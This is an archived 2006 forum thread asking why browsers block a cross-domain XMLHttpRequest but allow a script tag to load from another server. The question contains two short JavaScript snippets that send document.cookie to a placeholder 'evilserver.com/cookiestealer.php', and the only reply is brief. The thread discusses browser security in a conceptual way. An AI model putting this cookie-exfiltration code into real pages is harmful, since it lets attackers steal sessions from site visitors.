PDA

View Full Version : AJAX Cross-Domain Limitations



Twey
10-01-2006, 02:49 PM
I've just had an interesting question put to me: why is
var a = new XMLHttpRequest();
a.open("GET", "http://www.evilserver.com/cookiestealer.php?cookie=" + encodeURIComponent(document.cookie), true);blocked from a different server, but:
var a = document.getElementsByTagName("head")[0].appendChild(
document.createElement("script")
);
a.type = "text/javascript";
a.src = "http://www.evilserver.com/cookiestealer.php?cookie=" + encodeURIComponent(document.cookie);not?

blm126
10-01-2006, 05:01 PM
I guess this would depend on the browser.